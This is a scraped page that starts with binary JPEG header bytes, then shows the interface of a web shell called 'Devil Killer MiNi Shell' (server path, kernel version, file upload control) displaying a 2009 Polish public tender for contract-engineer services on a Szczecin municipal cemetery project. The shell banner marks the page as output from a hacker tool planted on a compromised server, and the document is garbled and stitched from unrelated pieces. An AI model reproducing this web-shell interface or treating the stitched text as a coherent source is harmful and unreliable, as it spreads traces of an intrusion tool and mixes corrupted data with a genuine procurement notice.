JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091007/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091007/349840-N-2009.html

<p class="kh_header"><b>Szczecin: PEŁNIENIE FUNKCJI INŻYNIERA KONTRAKTU WRAZ Z ZAPEWNIENIEM INSPEKTORÓW NADZORU NA ZADANIU PN.: Budowa Cmentarza Komunalnego przy ul. Bronowickiej w Szczecinie - część I</b><br>
<b>Numer ogłoszenia: 349840 - 2009; data zamieszczenia: 07.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Usług Komunalnych , ul. Ku Słońcu 125a, 71-080 Szczecin, woj. zachodniopomorskie, tel. 091 484 82 94, faks 091 484 80 55.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.zuk.szczecin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna jednostki samorządu terytorialnego - zakład budżetowy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PEŁNIENIE FUNKCJI INŻYNIERA KONTRAKTU WRAZ Z ZAPEWNIENIEM INSPEKTORÓW NADZORU NA ZADANIU PN.: Budowa Cmentarza Komunalnego przy ul. Bronowickiej w Szczecinie - część I.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Dane ogólne.
1.1. Przedmiot zamówienia.
Przedmiotem zamówienia jest pełnienie funkcji Inżyniera Kontraktu wraz z zapewnieniem inspektorów nadzoru na zadaniu pn.: Budowa cmentarza komunalnego przy ul. Bronowickiej w Szczecinie - część I w Szczecinie, tj. świadczenie usług związanych z przygotowaniem, zarządzaniem, kontrolą i nadzorem nad realizacją robót budowlanych.
Rodzaj zamówienia: usługa.
Przedstawiciel Wykonawcy niniejszego zamówienia będzie działał w zakresie uprawnień i obowiązków określonych w niniejszej specyfikacji istotnych warunków zamówienia (siwz) oraz wynikających z aktualnych przepisów ustawy Prawo budowlane.
Roboty budowlane wykonywane będą na podstawie umowy pomiędzy Gminą Miasto Szczecin - Zakładem Usług Komunalnych, a Wykonawcą Robót, zwanej dalej Kontraktem.


1.2. Cel zamówienia.
Zamawiający powierzy Inżynierowi Kontraktu zarządzanie, kontrolę, nadzór nad realizacją oraz rozliczenie Kontraktu, o którym mowa w pkt. 1.1., w celu wykonania obiektu zgodnie z dokumentacją projektową w ustalonym w umowie z Wykonawcą Robót terminie.
1.3. Charakterystyka obiektu.
Budowa cmentarza komunalnego przy ul. Bronowickiej w Szczecinie - część I obejmująca: 
1.  Wykonanie zagospodarowania terenu na obszarze określonym w załączniku nr 6 do siwz: 
1.1  wykonanie prac wstępnych (w tym usunięcie drzew owocowych i krzewów) ,
1.2. wykonanie rozbiórek istniejących elementów i sieci,
1.3. budowę przyłączy wod-kan. i kanalizacji deszczowej, instalacji na terenie wod-kan. I deszczowej,
1.4. budowę elektroenergetycznych sieci zewnętrznych 0,4 kV oraz kanalizacji teletechnicznej,
1.5. budowę przyłącza telekomunikacyjnego i orurowania do monitoringu,
1.6. budowę instalacji logicznej i CCTV,
1.7. budowę nawierzchni utwardzonych, obejmujących m.in.:
-	drogi dojazdowe i zjazdy z kostki kamiennej
-	ciągi piesze z kostki kamiennej
-	chodniki z kostki kamiennej
-	alejki o nawierzchni szutrowej
-	alejki o nawierzchni bitumicznej
1.8. budowę obiektów towarzyszących (stróżówka, toaleta),
1.9. budowę ścian urnowych,
1.10. budowę punktów czerpania wody,
1.11. budowę pojemników (zabudowa) do zbiórki odpadów,
1.12. dostawę i montaż ławek parkowych,
1.13. wykonanie trawników,
1.14. nasadzenie drzew i krzewów, pnączy, runa parkowego i bylin ,

2.	Budowę ogrodzenia cmentarza, w tym:
2.1.	budowa ogrodzenia ozdobnego z gabionów wraz z bramami i bramkami,
2.2.	budowa ogrodzenia segmentowego wraz z bramami i bramkami,
zgodnie z załącznikiem nr 7 do siwz.

3.	Wykonanie skablowania sieci SN-15kV obejmującego m.in.:

3.1.	demontaż istniejących słupów,
3.2.	ułożenie linii kablowej SN-15kV,
zgodnie z załącznikiem nr 8 do siwz.

4.	Budowę parkingu dla samochodów osobowych  w tym:

4.1.	budowa kanalizacji deszczowej,
4.2.	budowa oświetlenia zewnętrznego,
4.3.	budowa miejsc parkingowych oraz dróg wewnętrznych i zjazdów z kostki kamiennej,
zgodnie z załącznikiem nr 9 do siwz.

5.   Docelowe rozwiązania na istniejącym parkingu (bez gazu).

1.4. Dokumentacja Zamawiającego.
Zamawiający przekaże Wykonawcy (Inżynierowi Kontraktu), na czas trwania umowy, kopie następujących dokumentów:
1)	dokumentację projektowo-kosztorysową i Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych,
2)	umowę o roboty budowlane z Wykonawca Robót - Kontrakt,
3)	kopię oferty Wykonawcy Robót,
4)	decyzje administracyjne pozwalające na realizację Kontraktu,
5)	inne będące w posiadaniu dokumenty składające się na Kontrakt,
oraz poinformuje o umowach cywilno-prawnych i znanych mu wymaganiach prawnych i administracyjnych mających wpływ na realizację umowy.

2.	Zakres działań.
2.1. Ogólne obowiązki Inżyniera Kontraktu:
1)	sprawdzenie kompletności dokumentacji projektowej, uczestniczenie w procesie przygotowania i realizacji przetargu na wykonawstwo robót budowlanych,
2)	zarządzanie procesem inwestycyjnym w imieniu Zamawiającego, pełnienie funkcji inspektora nadzoru inwestorskiego zgodnie z przepisami polskiego prawa i postanowieniami odpowiednich pozwoleń na prowadzenie budowy,
3)	wykonywanie innych czynności, o których mowa w Rozdziale XIV niniejszej siwz,
4)	wspieranie Zamawiającego we wszystkich czynnościach technicznych, administracyjnych i finansowych związanych z realizacją Kontraktu.
5)	działanie we współpracy z Zamawiającym i na jego rzecz w całym okresie realizacji Kontraktu,
6)	zapewnienie stałej wymiany informacji z Zamawiającym oraz koordynację swojej działalności 
z wymaganiami Zamawiającego,
7)	w przypadku, gdyby postęp robót budowlanych nie był zadawalający z przyczyn niezależnych od Wykonawcy Robót, Inżynier Kontraktu zobowiązany jest do poinformowania Zamawiającego o wszystkich środkach, które należy podjąć w celu zaradzenia zaistniałej sytuacji oraz wypełnienia zobowiązań wynikających z umowy o roboty budowlane.

2.2. Etap poprzedzający budowę 
Inżynier Kontraktu zobowiązany będzie do:
1)	zapoznania się, sprawdzenia wzajemnej zgodności i kompletności dokumentacji projektowej, przedmiarów robót i specyfikacji technicznej wykonania i odbioru robót, dostarczonych przez Projektanta. Po zakończeniu tej czynności, Inżynier pisemnie potwierdzi jej wykonanie oraz przekaże ewentualne uwagi (zaproponuje konkretne rozwiązania) wynikające ze sprawdzenia dokumentacji,
2) 	uczestniczenie w procesie przygotowania i realizacji przetargu na wykonawstwo robót budowlanych, w 	tym uczestniczenie przy opracowywaniu odpowiedzi na zapytania oferentów (Wykonawców Robót) na etapie trwania procedury przetargowej,
3)	przeprowadzenia inspekcji terenu budowy w celu sprawdzenia zgodności stanu istniejącego z dokumentacja projektową,

2.3.  Etap budowy.
2.3.1. Inżynier Kontraktu jest upoważniony i zobowiązany do:
1)	stałej obecności na terenie budowy przez okres trwania Kontraktu,
2)	sprawowania nadzoru inwestorskiego przez uprawnionych przedstawicieli - inspektorów nadzoru, zgodnie z wymogami ustawy Prawo budowlane, reprezentowania Zamawiającego w kontaktach z osobami trzecimi w sprawach związanych z Kontraktem,
3)	nieskrępowanego dostępu do terenu budowy oraz wszelkich miejsc gdzie materiały i urządzenia będą pozyskiwane, wytwarzane, montowane, składowane lub przygotowywane do wbudowania,
4)	przekazania Wykonawcy Robót terenu budowy,
5)	prowadzenia regularnych inspekcji na terenie budowy w celu sprawdzenia jakości wykonywanych robót oraz wbudowywanych materiałów, zgodnie z wymaganiami specyfikacji technicznych, dokumentacji projektowej, praktyką inżynierską oraz stosownymi przepisami,
6)	odpowiednio wyprzedzające informowanie Zamawiającego o wszelkich zagrożeniach występujących podczas realizacji robót, które mogą mieć wpływ na wydłużenie czasu wykonania lub zwiększenia kosztów oraz proponowanie sposobów ich zapobiegania,
7)	kontrolowania przestrzegania przez Wykonawcę Robót zasad bezpieczeństwa pracy i utrzymania porządku na terenie budowy w tym sprawdzenie i zatwierdzenia planu bezpieczeństwa i ochrony zdrowia oraz wymagań przepisów ochrony środowiska i gospodarki odpadami,
8)	ścisłej współpracy z osobami sprawującym Nadzór Autorski;
9)	udzielania Wykonawcy Robót wszelkich dostępnych informacji i wyjaśnień dotyczących Kontraktu,
10)	kontroli zgodności oznakowania robót z zatwierdzonym projektem tymczasowej organizacji ruchu,
11)	wyrażania zgody na wykonywanie robót w nocy i dni wolne od pracy,
12)	wnioskowania o usunięcie z terenu budowy każdej osoby zatrudnionej przez Wykonawcę Robót, która zachowuje się niewłaściwie lub jest niekompetentna lub niedbała w swojej pracy,
13)	organizowania oraz przewodniczenia (nie mniej niż 2 razy w miesiącu) naradom dotyczącym postępu robót (Rad Budowy) w których udział biorą przedstawiciele wszystkich zaangażowanych w realizację Kontraktu stron (Wykonawca Robót, Inżynier, Zamawiający oraz inni oficjalni obserwatorzy) oraz sporządzenie i przekazywanie protokółów z tych narad w ciągu 5 dni od daty narady,
14)	organizowania narad technicznych oraz sporządzania protokółów z tych narad i przekazywania ich Zamawiającemu, Wykonawcy Robót i uczestnikom, w terminie 5 dni od dnia narady,
15)	monitorowania postępu robót poprzez sprawdzanie ich rzeczywistego zaawansowania i zgodności realizacji z obowiązującym  harmonogramem robót,
16)	kontroli sposobu składowania i przechowywania materiałów,
17)	nadzorowania badań materiałów i robót wykonywanych przez Wykonawcę Robót,
18)	zlecania Wykonawcy Robót wykonania dodatkowych badań materiałów lub robót budzących wątpliwość co do ich jakości,
19)	zlecania na własny koszt wykonania kontrolnych badań laboratoryjnych i pomiarów, Laboratorium wskazanemu przez Zamawiającego, w zakresie koniecznym do weryfikacji badań Wykonawcy Robót,
20)	zatwierdzania i opiniowania Programów Zapewnienia Jakości,
21)	weryfikacji i zatwierdzania, po uprzednim zaopiniowaniu przez Nadzór Autorski, rysunków wykonawczych sporządzanych przez Wykonawcę Robót,
22)	weryfikowania rysunków powykonawczych sporządzanych przez Wykonawcę Robót,
23)	dokonywania obmiaru wykonanych robót,
24)	dokonywania odbioru robót zanikających i ulegających zakryciu,
25)	sprawdzenia wykonanych robót i powiadomienie Wykonawcy Robót o wykrytych wadach oraz określenia zakresu koniecznych do wykonania robót w celu usunięcia wykrytych wad,
26)	poświadczenia usunięcia przez Wykonawcę Robót wad,
27)	przygotowania do odbioru częściowego i końcowego robót, sprawdzenia kompletności i prawidłowości przedłożonych przez Wykonawcę Robót dokumentów wymaganych do odbioru oraz uczestnictwo w odbiorze robót,
28)	poświadczenia terminu zakończenia robót,
29)	dostarczenia Zamawiającemu wszelkich raportów, akt, certyfikatów przygotowanych przez Wykonawcę Robót po zakończeniu robót,
30)	zapobiegania roszczeniom Wykonawcy Robót,
31)	powiadomienia Zamawiającego o wszelkich roszczeniach Wykonawcy Robót oraz rozbieżnościach między dokumentacją Zamawiającego, a stanem faktycznym na terenie budowy,
32)	sprawdzenia ostatecznej kwoty należnej Wykonawcy Robót,
33)	rozliczenia umowy o roboty budowlane w przypadku jej wypowiedzenia lub odstąpienia,
34)	wydania polecenia przyspieszenia lub opóźnienia tempa robót,
35)	załatwianie wszelkiego rodzaju skarg i roszczeń osób trzecich wywołanych realizacją Kontraktu, w uzgodnieniu z Zamawiającym,
36)	zatwierdzania Laboratorium Wykonawcy Robót, o ile nie zostało wskazane w jego ofercie, po sprawdzeniu kwalifikacji personelu, kompletności i sprawności sprzętu i urządzeń laboratoryjnych oraz propozycję Wykonawcy Robót odnośnie zmiany Laboratorium na inne niż wskazane w ofercie Wykonawcy Robót,
37)	sporządzenia protokołu odzysku materiałów pochodzących z rozbiórek należy dokonać wspólnie z przedstawicielem Zakładu Usług Komunalnych w Szczecinie,
38)	przygotowywania komunikatów dotyczących postępów robót i sytuacji na budowie na każde żądanie rzecznika prasowego Zamawiającego,
39)	przygotowywanie komunikatów dotyczących zmian organizacji ruchu w związku z realizacją przedsięwzięcia, wraz z ze schematami objazdów oraz utrudnień występujących w ruchu drogowym oraz inne istotne informacje dla mieszkańców Szczecina.

2.3.2. Inżynier Kontraktu w uzgodnieniu z Zamawiającym będzie decydować o:
1)	dopuszczeniu materiałów, prefabrykatów i wszystkich elementów i urządzeń przewidzianych do wbudowania i wykorzystania przy realizacji robót,
2)	zatwierdzeniu receptur i technologii proponowanych przez Wykonawcę Robót,
3)	dopuszczeniu do pracy wytwórni mas bitumicznych i betonowych, wytwórni prefabrykatów oraz sprzętu i środków transportu Wykonawcy Robót,
4)	wstrzymaniu robót prowadzonych w sposób zagrażający bezpieczeństwu lub niezgodnie z wymaganiami Kontraktu,
5)	sposobie zabezpieczenia wykopalisk odkrytych na terenie budowy.

2.3.3. Inżynier Kontraktu będzie wnioskować do Zamawiającego o:
1)	wprowadzenie zmian w dokumentacji projektowej,
2)	zatwierdzenie Laboratorium do przeprowadzenia niezbędnych badań i pomiarów,
3)	zlecenie usunięcia wad stronie trzeciej w przypadku gdy Wykonawca Robót nie usunie ich w wyznaczonym terminie,
4)	zmianę terminu wykonania robót w umowie o roboty budowlane, kiedy zmiana taka nie wynika z winy czy zaniedbań Wykonawcy Robót,
5)	zlecenie wykonania robót dodatkowych,
6)	zatwierdzenie Harmonogram Robót i Płatności przedstawionego przez Wykonawcę Robót,
7)	akceptację propozycji Wykonawcy Robót odnośnie zmiany w Kierownictwie Wykonawcy Robót (na inne osoby niż wskazane w ofercie Wykonawcy Robót).

2.3.4. Roboty dodatkowe.
1)	W przypadku wystąpienia konieczności wykonania robót dodatkowych Inżynier Kontraktu zobowiązany jest do bezzwłocznego pisemnego powiadomienia Zamawiającego.
2)	Inżynier Kontraktu przygotowuje dla Zamawiającego protokół spisany przy udziale przedstawicieli Nadzoru Autorskiego, Inżyniera Kontraktu i Zamawiającego, zawierający opis powstałych problemów technicznych, opis zmian koniecznych w dokumentacji projektowej, opis niezbędnych do wykonania robót dodatkowych.
3)	Inżynier Kontraktu przedstawia Zamawiającemu kalkulację kosztów Wykonawcy Robót na wykonanie robót dodatkowych. Wartość i zakres robót dodatkowych każdorazowo będzie podlegać weryfikacji i akceptacji Zamawiającego.
4)	Wydanie przez Inżyniera Kontraktu polecenia wykonania robót dodatkowych odbywać się może wyłącznie po uzyskaniu pisemnej zgody Zamawiającego.
5)	Uzasadnione roboty dodatkowe Zamawiający będzie traktował jako zamówienie dodatkowe udzielane zgodnie z ustawą Prawo zamówień publicznych. 

2.4. Etap po zakończeniu robót.
2.4.1.Po zakończeniu robót Inżynier Kontraktu dokona ich odbioru w uzgodnieniu z Zamawiającym 
i wystawi protokół odbioru końcowego.
Do zadań Inżyniera Kontraktu będzie należało:
1)	finalizacja zadań wynikających z obowiązków na etapie budowy,
2)	sprawdzenie i potwierdzenie gotowości budowli do dokonania przez Zamawiającego komisyjnego odbioru ostatecznego wraz z przygotowaniem wszelkich niezbędnych dokumentów,
3)	dokonywanie inspekcji i nadzór nad robotami zaległymi oraz robotami niezbędnymi do usunięcia wad,
4)	odbiór wykonanych robót związanych z usunięciem wad,
5)	reprezentowanie Zamawiającego podczas kontroli nadzoru budowlanego w sytuacjach występujących podczas realizacji inwestycji, jak również zadbanie o przygotowanie przez Wykonawcę Robót dokumentów wymaganych przez nadzór budowlany,
6)	wspieranie Zamawiającego w negocjacjach dotyczących nierozstrzygniętych roszczeń i sporów,
7)	rozliczenie rzeczowe i finansowe zadania inwestycyjnego,
8)	przeprowadzenie przeglądu wykonanej zieleni.

2.4.2. Inżynier Kontraktu zobowiązany jest do uczestnictwa w przeglądach w okresie rękojmi. 
Zamawiający powiadomi Inżyniera Kontraktu o przeglądach gwarancyjnych na 7 dni przed wyznaczonym terminem przeglądu.

Inżynier Kontraktu nie może zwolnić którejkolwiek ze stron z jakichkolwiek obowiązków, zobowiązań lub odpowiedzialności wynikających z umowy o roboty budowlane.

3.    Wymagania.
3.1. Personel
a)	Nadzór nad realizacją Kontraktu będzie powierzony osobom wskazanym w ofercie Inżyniera Kontraktu na Załączniku nr 3 do siwz - wykaz osób przewidzianych do wykonania zamówienia, zwanym w dalszej treści Zespołem Inżyniera. 
b)	Inżynier Kontraktu w terminie 1 tygodnia od podpisania Umowy opracuje i przedstawi do akceptacji Zamawiającego, schemat organizacyjny Zespołu Inżyniera wraz ze szczegółowym zakresem obowiązków i uprawnień jakie zamierza przekazać poszczególnym osobom wchodzącym w skład zespołu.
c)	Inżynier Kontraktu może przewidzieć zatrudnienie dodatkowych osób, których wynagrodzenie należy uwzględnić w ofercie.
d)	Inżynier Kontraktu wraz z zespołem powinien być dostępny na każde zasadne wezwanie Zamawiającego lub Wykonawcy Robót.

4. Kontrola realizacji Kontraktu.
Podstawowym zadaniem Inżyniera Kontraktu jest kontrola zgodności działań Wykonawcy Robót z wymaganiami określonymi w umowie na roboty budowlane i obowiązujących przepisach prawa. 
Inżynier Kontraktu, w granicach przyznanych mu uprawnień i w ramach prawa budowlanego, będzie prowadził kontrolę jakości materiałów i robót, postęp prac oraz potwierdzał ilość i wartość wykonanych robót. 

5. Raporty.
5.1. Raporty miesięczne.
Inżynier Kontraktu w ciągu 2 dni roboczych po zakończeniu każdego miesiąca kalendarzowego przedłoży Zamawiającemu Raport miesięczny wyszczególniający wykonane przez Zespół Inżyniera prace i kontrolne badania laboratoryjne oraz poinformuje o postępie robót, uzyskiwanym poziomie jakości robót, sprawach finansowych oraz występujących problemach w realizacji umowy na roboty budowlane.
Raport będzie zawierał:
1)	opis postępu robót w stosunku do przyjętego harmonogramu,
2)	nakłady finansowe poniesione na roboty w powiązaniu z przyjętym harmonogramem,
3)	plan robót i finansowania na kolejne miesiące,
4)	opis powstałych problemów i zagrożeń oraz działań podjętych w celu ich usunięcia,
5)	fotografie dokumentujące postęp robót,
6)	wykaz zmian w dokumentacji projektowej,
7)	wykaz roszczeń i etap ich rozpatrzenia.

5.2. Raport końcowy.
Po zakończeniu robót, przed odbiorem końcowym, Inżynier Kontraktu przedłoży Zamawiającemu komplet, sporządzonej przez Wykonawcę Robót dokumentacji powykonawczej w ilościach i zakresie jak wynika 
to z prawa budowlanego i bieżących potrzeb użytkowników branżowych.
Inżynier Kontraktu przedłoży Zamawiającemu Raport końcowy, który będzie zawierał:
a)	końcowe rozliczenie ilości wykonanych robót i powykonawczą Tabelę Elementów Rozliczeniowych,
b)	rozliczenie finansowe zadania inwestycyjnego,
c)	protokół odbioru końcowego,
d)	całą dokumentację kontraktową do odbioru końcowego zawierającą takie dokumenty jak: sprawozdanie techniczne końcowe, protokoły z Rad Budowy, inwentaryzację geodezyjną powykonawczą, mapę powykonawczą, wystąpienia Wykonawcy, instrukcje zmian, wnioski Wykonawcy, obmiary, aprobaty techniczne, atesty i deklaracje zgodności, receptury, świadectwa jakości, programy zapewnienia jakości, wyniki badań, dokumentację powykonawczą techniczną, informacje niezbędne do sporządzenia dokumentów PT, OT, książki obiektu, itp. 

Dokumenty wymienione w pkt 5.1. i 5.2. należy przekazywać do Zamawiającego w wersji drukowanej i elektronicznej. 

6. Warunki płatności i kary.
6.1.	Wynagrodzenie dla Inżyniera Kontraktu za wykonane usługi w czasie realizacji Robót będzie 	wypłacane w oparciu o harmonogram płatności, sporządzony przez Inżyniera Kontraktu, który 	stanowić będzie załącznik do umowy. 
6.2.		Harmonogram powinien przewidywać:
a)	pierwszą płatność w wysokości nie większej niż 5% wartości umowy, która zrealizowana zostanie po wykonaniu czynności, o których mowa w pkt 2 ppkt 2.2. niniejszego rozdziału,
b)	ostatnią płatność w wysokości nie mniejszej niż 10% wartości umowy, która zrealizowana zostanie po rozliczeniu końcowym Wykonawcy Robót.
6.3.		Rozliczenia i realizacja płatności nastąpi zgodnie z § 8 wzoru umowy.
6.4.	   Podstawą płatności będą faktury przejściowe i faktura końcowa wystawione dla Zamawiającego. 
Podstawą do wystawienia faktury przejściowej i faktury końcowej będą potwierdzone przez Zamawiającego protokoły odbioru dokumentów opisanych w pkt 5 niniejszego Rozdziału siwz.
6.5.	W przypadku nie wywiązywania się Inżyniera z któregokolwiek ze zobowiązań wynikających z umowy, Zamawiający wstrzyma, do czasu ustania przyczyny, płatności faktur - w części lub w całości. W takim przypadku nie przysługują Inżynierowi odsetki z tytułu opóźnienia w zapłacie.
6.6.	Nie przewiduje się zaliczek na poczet realizacji umowy. 
6.7.	Kary umowne za nieterminowe wykonanie przez Inżyniera Kontraktu powierzonych mu zadań naliczone zostaną zgodnie z § 13 wzoru umowy.

7.  Rozwiązanie umowy.
W przypadku unieważnienia przetargu na wybór Wykonawcy Robót na podstawie art. 93 ust. 1 ustawy Prawo zamówień publicznych, Zamawiający zastrzega sobie możliwość rozwiązania umowy z Inżynierem Kontraktu.
Rozwiązanie umowy nie będzie skutkowało wystąpieniem Inżyniera Kontraktu o roszczenia finansowe.

8.  Ubezpieczenie.
8.1.	Inżynier Kontraktu jest zobowiązany przedstawić zamawiającemu najpóźniej w dniu podpisania umowy o Pełnienie funkcji Inżyniera Kontraktu wraz z zapewnieniem inspektorów nadzoru na zadaniu pn.: Budowa cmentarza komunalnego przy ul. Bronowickiej w Szczecinie - część I umowę ubezpieczenia odpowiedzialności cywilnej za szkody wyrządzone na mieniu lub na osobie, powstałe w związku z realizacją prac określonych w umowie, szkody powstałe z tytułu niewykonania lub nienależytego wykonania umowy, zakres ubezpieczenia winien obejmować czyste straty finansowe, czyli szkody nie wynikające ze szkód w mieniu ani na osobie - przy sumie gwarancyjnej nie mniejszej niż 1 000 000,00 PLN (słownie złotych: jeden milion złotych i 00/100) na jedno i wszystkie zdarzenia w okresie ubezpieczenia.
8.2.	Zgodnie z rozumieniem niniejszych zapisów, szkody na mieniu lub na osobie obejmują szkody polegające na utracie, zniszczeniu lub uszkodzeniu mienia lub na spowodowaniu śmierci, uszkodzeniu ciała lub rozstroju zdrowia z włączeniem szkód następczych.
8.3.	Za czystą stratę finansową uważa się określony w pieniądzu uszczerbek majątkowy poniesiony przez poszkodowanego, nie wynikający ze: szkody w mieniu (w tym także w wartościach pieniężnych), szkody na osobie, naruszenia dóbr osobistych, pozbawienia możliwości korzystania z rzeczy, zmniejszenia wartości mienia.
8.4.	Umowa ubezpieczenia odpowiedzialności cywilnej ma być ważna na dzień rozpoczęcia przez Inżyniera Kontraktu działań poprzedzających budowę, w czasie jej realizacji i obowiązywać do dnia przekazania zamawiającemu Raportu końcowego.
8.5.	Umowa ubezpieczenia ma dotyczyć wyłącznie realizowanego Kontraktu.
8.6.	Ważność przedłożonej umowy ubezpieczenia ma być potwierdzona zamawiającemu przedstawieniem przez Inżyniera Kontraktu potwierdzenia zapłaty składki lub w przypadku płatności ratalnej składek ubezpieczeniowych.
8.7.	W sytuacji nie przedstawienia przez Inżyniera Kontraktu umowy ubezpieczenia odpowiedzialności cywilnej najpóźniej w dniu podpisania umowy, zamawiający, po wyznaczeniu dodatkowego terminu na przedłożenie przedmiotowej umowy ubezpieczenia odpowiedzialności cywilnej, ma prawo zawrzeć umowę na koszt Inżyniera Kontraktu. Wówczas zamawiający opłaci wymaganą składkę, a następnie potrąci poniesione koszty z płatności należnych Inżynierowi Kontraktu bez odrębnego wezwania.

9.	Zmiana umowy.
Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, a mianowicie zmianę terminu realizacji przedmiotu zamówienia w przypadku, gdy termin realizacji Kontraktu przez Wykonawcę Robót ulegnie zmianie..</p>
